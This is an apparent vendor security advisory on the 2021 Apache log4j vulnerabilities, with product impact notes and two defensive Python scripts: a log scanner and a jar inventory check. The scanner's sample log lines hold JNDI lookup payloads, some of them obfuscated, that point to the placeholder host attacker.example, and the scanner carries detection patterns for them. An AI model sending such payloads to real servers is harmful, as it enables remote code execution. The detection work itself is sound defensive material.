Updated: Dec 18, 2021

Summary

On Dec. 9, 2021, a remote code execution (RCE) vulnerability, CVE-2021-44228, in Apache log4j 2 was identified, and attackers are already actively exploiting it. On Dec. 14, 2021, a second vulnerability, CVE-2021-45046, was announced and fixed in log4j v2.16.0 and v2.12.2. A third vulnerability, CVE-2021-45105, was announced and fixed in log4j v2.17.0.

Netsurion Managed Open XDR v9 core code does not use the Apache log4j library. Our analysis shows no components of Netsurion Managed Open XDR v9.3 are affected by this vulnerability. 

Note: Netsurion Managed Open XDR v9.3 incorporates ElasticSearch v7.2.1. A scan of the installation will show Program Files\Elasticsearch-7.2.1\lib\log4j-core-2.11.1.jar, which may be considered vulnerable. However, this is not exploitable and does not require urgent remediation.

Technical Security Advisory
  • Elastic confirms in its announcement that “Elasticsearch 6 and 7 are not susceptible to remote code execution with this vulnerability due to our use of the Java Security Manager”
  • The implementation of Elasticsearch is bound to localhost (127.0.0.1) only and is not directly accessible from another machine
  • We have tested and confirmed the above statement from Elastic

More information:
https://logging.apache.org/log4j/2.x/security.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://nvd.nist.gov/vuln/detail/CVE-2021-45105


The Log4j Vulnerability Explained, How to Assess your Risk and Mitigation Steps

A.N. Ananth, President and Chief Strategy Officer, explains the background, context and consequences of this exploit, and the appropriate steps to defend against it.


Update on Log4j Vulnerability – Dec 18, 2021

Updated information on mitigation techniques.


Update on Log4j Vulnerability – Dec 17, 2021

Updated information on mitigation techniques.


Detecting Log4j Vulnerability with Netsurion’s Managed Threat Protection service

A.N. Ananth, President and Chief Strategy Officer, demonstrates how the Netsurion Managed Threat Protection service predicts, prevents, and detects attacks on vulnerable log4j instances in your monitored network.

Background

Apache log4j 2 is an open-source Java-based logging framework that is used within numerous Java applications. The library allows developers to log various data from within their application. In certain circumstances, the data being logged originates from user input. Should that user input contain special characters and subsequently be logged by log4j, the log4j lookup mechanism is invoked and ends up loading and executing a user-specified remote Java class from a Lightweight Directory Access Protocol (LDAP) server. This in turn leads to RCE on the victim’s server running the vulnerable log4j 2 instance.

Public Proof of Concept (PoC) code was released, and subsequent investigation revealed that exploitation is easy to perform. By submitting a specially crafted request to a vulnerable system, an attacker is able, depending on how the system is configured, to instruct it to download and execute a malicious payload. Because the exploit was discovered so recently, many servers, both on-premises and in cloud environments, have yet to be patched. As with many high-severity RCE exploits, massive internet-wide scanning for CVE-2021-44228 has already begun, with the intent of seeking out and exploiting unpatched systems.
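The "special characters" the background refers to are log4j lookup expressions, the ones that matter here beginning with the ${jndi: prefix. The script below is an added detection example, not Netsurion's code and not part of the original advisory: it runs over a few constructed web-access-log lines (attacker.example is a placeholder host, not a real indicator), percent-decodes each line, collapses single-character nested lookups that are commonly used to defeat naive substring matching, and reports every line that still carries a JNDI lookup afterwards.

```python
import re
import urllib.parse

# Constructed sample lines in common web-access-log format (not real traffic).
# attacker.example is a placeholder host, not a real indicator.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:03:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:44 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.11 - - [10/Dec/2021:03:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://attacker.example/c}"',
    '10.0.0.13 - - [10/Dec/2021:03:15:30 +0000] "GET /docs/log4j-upgrade.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# Inner lookups that resolve to a single character (${lower:j}, ${upper:J},
# ${::-j}) are the wrappers most often used to break naive substring matching.
_SINGLE_CHAR_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^${}])\}|\$\{::-([^${}])\}', re.IGNORECASE)

# The lookup prefix that hands the logged string to JNDI.
_JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:[^}]*\}?', re.IGNORECASE)


def normalize(text):
    """Percent-decode and collapse single-character nested lookups until stable."""
    text = urllib.parse.unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _SINGLE_CHAR_LOOKUP.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalized_lookup) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = _JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((lineno, match.group(0)))
    return hits


if __name__ == "__main__":
    for lineno, lookup in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {lineno}: {lookup}")
```

Run against the constructed lines, the scanner flags lines 2, 3 and 4 and leaves the two benign requests alone, including the one that merely mentions log4j in a path. It is a first-pass filter for web, proxy and application logs, not a substitute for patching: a request that is logged by a vulnerable log4j instance has already triggered the lookup by the time it is found, so hits should be treated as evidence of attempted exploitation and followed up on the affected host.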

Affected version

Apache Log4j 2.x <= 2.15.0-rc1

Available updates

Apache has released 2.17.0 (for Java 8 and up), which addresses CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.
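The note in the summary above describes exactly the situation an inventory check turns up: a scan of the installation shows a log4j-core-2.11.1.jar that looks vulnerable by version alone. The script below is an added example, not Netsurion's code and not part of the original advisory. It walks an installation directory, classifies every log4j-core jar it finds against the 2.17.0 release named above (the Java 7 line, 2.12.x, has its own fixed releases and is deliberately not modelled; that is an assumption of this example, and Apache's security page linked above is the reference for that branch), and checks whether the JndiLookup class is still inside the jar, since removing that class is the mitigation Apache documents for releases that cannot be upgraded. The make_demo_tree helper builds a constructed tree of empty stand-in jars so the check can be exercised offline.

```python
import os
import re
import tempfile
import zipfile

# Class whose removal from log4j-core is the mitigation Apache documents for
# releases that cannot be upgraded (see the Apache security page linked above).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Release named in the advisory as addressing all three CVEs (Java 8 and up).
# Assumption of this example: the Java 7 line (2.12.x) has its own fixed
# releases and is not modelled here; consult the Apache security page for it.
FIXED_VERSION = (2, 17, 0)

_JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)(?:-[\w.]+)?\.jar$", re.IGNORECASE)


def parse_version(filename):
    """Return (major, minor, patch) for a log4j-core jar name, else None."""
    match = _JAR_NAME.match(filename)
    return tuple(int(part) for part in match.groups()) if match else None


def assess_jar(path):
    """Classify one log4j-core jar as fixed, mitigated or vulnerable."""
    version = parse_version(os.path.basename(path))
    if version is None:
        return None
    with zipfile.ZipFile(path) as jar:
        jndi_present = JNDI_LOOKUP_CLASS in jar.namelist()
    if version >= FIXED_VERSION:
        status = "fixed"
    elif not jndi_present:
        status = "mitigated"   # below the fix line, but JndiLookup removed
    else:
        status = "vulnerable"  # below the fix line and JndiLookup still present
    return {"path": path, "version": version, "jndi_lookup_present": jndi_present, "status": status}


def scan_tree(root):
    """Walk an installation directory and assess every log4j-core jar found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if _JAR_NAME.match(name):
                result = assess_jar(os.path.join(dirpath, name))
                if result:
                    findings.append(result)
    findings.sort(key=lambda f: f["version"])
    return findings


def make_demo_tree():
    """Build a constructed installation tree of empty stand-in jars for a dry run."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    demo = {
        "log4j-core-2.11.1.jar": ["META-INF/MANIFEST.MF", JNDI_LOOKUP_CLASS],  # as in the Elasticsearch note
        "log4j-core-2.14.1.jar": ["META-INF/MANIFEST.MF"],                     # JndiLookup already stripped
        "log4j-core-2.17.0.jar": ["META-INF/MANIFEST.MF", JNDI_LOOKUP_CLASS],  # fixed release
        "log4j-api-2.17.0.jar": ["META-INF/MANIFEST.MF"],                      # not log4j-core, ignored
    }
    for name, entries in demo.items():
        with zipfile.ZipFile(os.path.join(lib, name), "w") as jar:
            for entry in entries:
                jar.writestr(entry, b"")
    return root


if __name__ == "__main__":
    for finding in scan_tree(make_demo_tree()):
        print(finding["status"].upper(), finding["path"])
```

Point scan_tree at a real installation root (for example the Elasticsearch directory mentioned in the summary) instead of the demo tree to get the same classification for real jars. Two caveats apply when reading the output: a "vulnerable" status is an inventory fact, not an exploitability verdict, and the Elasticsearch case above (Java Security Manager, bound to localhost only) shows why the two differ; and the check only looks at jars named log4j-core-*.jar on disk, so a copy of the library shaded into an application's own jar will not be found by file name.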

Conclusion

The CVE-2021-44228 vulnerability is still being actively investigated in order to properly identify its full scope and severity. Given the information currently available, this vulnerability may have a high impact at present and in the near future. Most of the affected applications are widely used in corporate networks. Users are encouraged to take all necessary steps to ensure they are protected against this vulnerability.